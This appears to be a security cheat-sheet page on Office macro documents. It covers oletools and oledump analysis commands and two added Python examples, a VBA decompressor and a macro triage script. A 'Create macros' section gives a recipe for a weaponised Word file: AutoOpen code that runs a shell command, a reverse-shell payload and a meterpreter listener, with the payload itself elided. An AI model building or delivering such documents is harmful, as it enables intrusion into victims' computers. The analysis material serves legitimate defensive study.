Generic analysis tools
- Unzip the file: unless it is a very old Office file, the document is a zip archive.
- exiftool:
exiftool doc.doc
- Analyse with oleid:
oleid doc.doc
- To see VBA scripts directly:
olevba /tmp/a.doc
- Analyse a document with oletools. See the readme. It has many subcommands to analyse various things.
- With ViperMonkey, macros can be analyzed in a VBA emulator.
- QuickSand is also an analysis framework.
Extract macros with oledump
Use oledump.py to extract macros. List the file contents:
python oledump.py $file
Example from an output:
...
7: M 16267 'Macros/VBA/NewMacros'
8: m 932 'Macros/VBA/ThisDocument'
...
To show details from a document part use the first number and execute
python oledump.py -s $no $file
But to extract macros, -v has to be used, because the macro source is additionally compressed.
python oledump.py -s $no -v $file
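What -v does is undo the MS-OVBA "compressed container" encoding of the module stream. The following is an added example, not code from the page or from the oledump project: a minimal decompressor for that format (signature byte 0x01, then chunks of literal and copy tokens), run on a compressed container constructed by hand for the example. It reproduces the same plaintext a tool like oledump -v or olevba would show for that stream.

```python
# Added example (not from the page or the oledump project): a minimal
# decompressor for the MS-OVBA "compressed container" format used to store
# VBA module source inside Office documents. This is the step oledump's -v performs.
import struct

CONTAINER_SIGNATURE = 0x01      # first byte of every compressed container
DECOMPRESSED_CHUNK_SIZE = 4096  # a chunk expands to at most this many bytes


def _copy_token_layout(difference):
    """Split of the 16-bit copy token into offset/length bits; it depends on
    how many bytes of the current chunk have already been decompressed."""
    bit_count = difference.bit_length()          # ceil(log2(difference)) ...
    if difference & (difference - 1) == 0:       # ... exact power of two
        bit_count -= 1
    bit_count = max(bit_count, 4)                # offset field is at least 4 bits
    length_mask = 0xFFFF >> bit_count
    offset_mask = 0xFFFF & ~length_mask
    return bit_count, length_mask, offset_mask


def decompress_vba(container):
    """Return the decompressed bytes of an MS-OVBA compressed container."""
    if not container or container[0] != CONTAINER_SIGNATURE:
        raise ValueError("not a compressed container (signature byte 0x01 missing)")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        if (header & 0x7000) != 0x3000:
            raise ValueError("bad chunk signature at offset %d" % pos)
        chunk_size = (header & 0x0FFF) + 3       # size includes the 2-byte header
        is_compressed = bool(header & 0x8000)
        chunk_end = min(pos + chunk_size, len(container))
        pos += 2
        chunk_start = len(out)                   # where this chunk's output begins
        if not is_compressed:
            out += container[pos:chunk_end]      # raw chunk, copied as-is
            pos = chunk_end
            continue
        while pos < chunk_end and len(out) - chunk_start < DECOMPRESSED_CHUNK_SIZE:
            flags = container[pos]               # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end or len(out) - chunk_start >= DECOMPRESSED_CHUNK_SIZE:
                    break                        # last token sequence may be short
                if not (flags >> bit) & 1:       # literal token: one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]  # copy token
                pos += 2
                difference = len(out) - chunk_start
                if difference == 0:
                    raise ValueError("copy token at start of chunk")
                bit_count, length_mask, offset_mask = _copy_token_layout(difference)
                length = (token & length_mask) + 3
                offset = ((token & offset_mask) >> (16 - bit_count)) + 1
                if offset > difference:
                    raise ValueError("copy token reaches before chunk start")
                src = len(out) - offset
                for i in range(length):          # byte-wise, since copies may overlap
                    out.append(out[src + i])
    return bytes(out)


# Constructed sample: one compressed chunk holding a tiny AutoOpen module.
SAMPLE_CONTAINER = (
    b"\x01"                          # container signature
    b"\x23\xB0"                      # header: compressed flag set, chunk size 0x23 + 3 = 38
    b"\x00" b"Sub Auto"              # flag byte, then 8 literal bytes
    b"\x00" b"Open()\r\n"            # flag byte, then 8 literal bytes
    b"\x80" b"'Entry " b"\x09\x90"   # 7 literals, then a copy token: 12 bytes from 19 back
    b"\x00" b"End Sub"               # flag byte, then 7 literals (short final sequence)
)


def decompress_sample():
    return decompress_vba(SAMPLE_CONTAINER).decode("ascii")


if __name__ == "__main__":
    print(decompress_sample())
```

The copy token 0x9009 is decoded with a 5-bit offset field because 23 bytes of the chunk have been produced at that point; the same token would mean something else earlier in the chunk, which is why the layout is recomputed per token.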
Create macros
- Create a new Word document
- Open the macro dialog (View -> Macros)
- Create a new macro there. You are now in the VB view.
- Make sure to set the dropdown which defines where the macro is stored. By default, it is stored in a local database and not in the document itself.
- When creating the macro, put it (or a function’s call) into the AutoOpen() and Document_Open() functions.
Sub AutoOpen()
    PayloadMacro
End Sub

Sub Document_Open()
    PayloadMacro
End Sub
(… see 5.)
- Add the payload, e.g. a reverse shell.
- Use make_reverse_powershell.py to create the payload.
- Use split_reverse_powershell.py to split the large command line to conform to the VB string limit. (!) Note that a line may not have more than 50 characters!
- Add it to the macro function:
Sub PayloadMacro()
    Dim Str As String
    Str = …
    Str = Str + …
    Str = Str + …
    CreateObject("Wscript.Shell").Run Str
End Sub
- Alternative: See Powercat section on the Reverse Shell post.
- Save the file.
- Open meterpreter reverse shell with
set PAYLOAD windows/x64/shell/reverse_tcp
- Wait and profit.
Another way: See windows/fileformat/word_mshtml_rce
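The macro skeleton above is also what an analyst should expect to find after extracting the module: auto-exec entry points, a string built up in short pieces to stay under the line limit, and a Wscript.Shell call at the end. The following is an added example, not code from the page: a small static triage of VBA source text that reports those three things, including reassembling the "Str = Str + ..." chain so the full command line can be read at once. The sample module is constructed for the example and runs only a harmless echo.

```python
# Added example (not from the page): static triage of a VBA module's source
# text. It reports auto-exec entry points, suspicious calls, and reassembles
# string variables that were built up with "Str = Str + ..." chains.
import re

AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                  "Workbook_Open", "Auto_Open")
# Indicator list is illustrative, not exhaustive.
SUSPICIOUS = ("CreateObject", "Wscript.Shell", "Shell(", ".Run ", "powershell",
              "-EncodedCommand", "DownloadString", "ChrW(")

_SUB_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
# X = "..."   or   X = X + "..."   (also accepts the & concatenation operator)
_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(?:(\w+)\s*[+&]\s*)?"((?:[^"]|"")*)"\s*$')


def find_autoexec(vba):
    """Procedure names that Office runs automatically on open/close, in source order."""
    wanted = {n.lower() for n in AUTOEXEC_NAMES}
    return [m.group(1) for m in _SUB_RE.finditer(vba) if m.group(1).lower() in wanted]


def find_suspicious(vba):
    """Indicators present in the source (case-insensitive), in list order."""
    low = vba.lower()
    return [s for s in SUSPICIOUS if s.lower() in low]


def rebuild_strings(vba):
    """Join 'X = "..."' and 'X = X + "..."' lines into the final value per variable."""
    values = {}
    for line in vba.splitlines():
        m = _ASSIGN_RE.match(line)
        if not m:
            continue
        name, base, piece = m.group(1), m.group(2), m.group(3).replace('""', '"')
        if base is None:                 # plain assignment starts a new value
            values[name] = piece
        elif base == name:               # self-concatenation extends it
            values[name] = values.get(name, "") + piece
    return values


def triage(vba):
    return {"autoexec": find_autoexec(vba),
            "suspicious": find_suspicious(vba),
            "strings": rebuild_strings(vba)}


# Constructed sample shaped like the skeleton above, with a harmless command.
SAMPLE_VBA = """\
Sub AutoOpen()
    PayloadMacro
End Sub

Sub Document_Open()
    PayloadMacro
End Sub

Sub PayloadMacro()
    Dim Str As String
    Str = "cmd.exe /c echo "
    Str = Str + "constructed sample"
    Str = Str + " > out.txt"
    CreateObject("Wscript.Shell").Run Str
End Sub
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

On a real module the input would be the decompressed stream text (for instance the output of oledump -v or olevba); the reassembled string is usually the quickest way to see what the macro would hand to the shell.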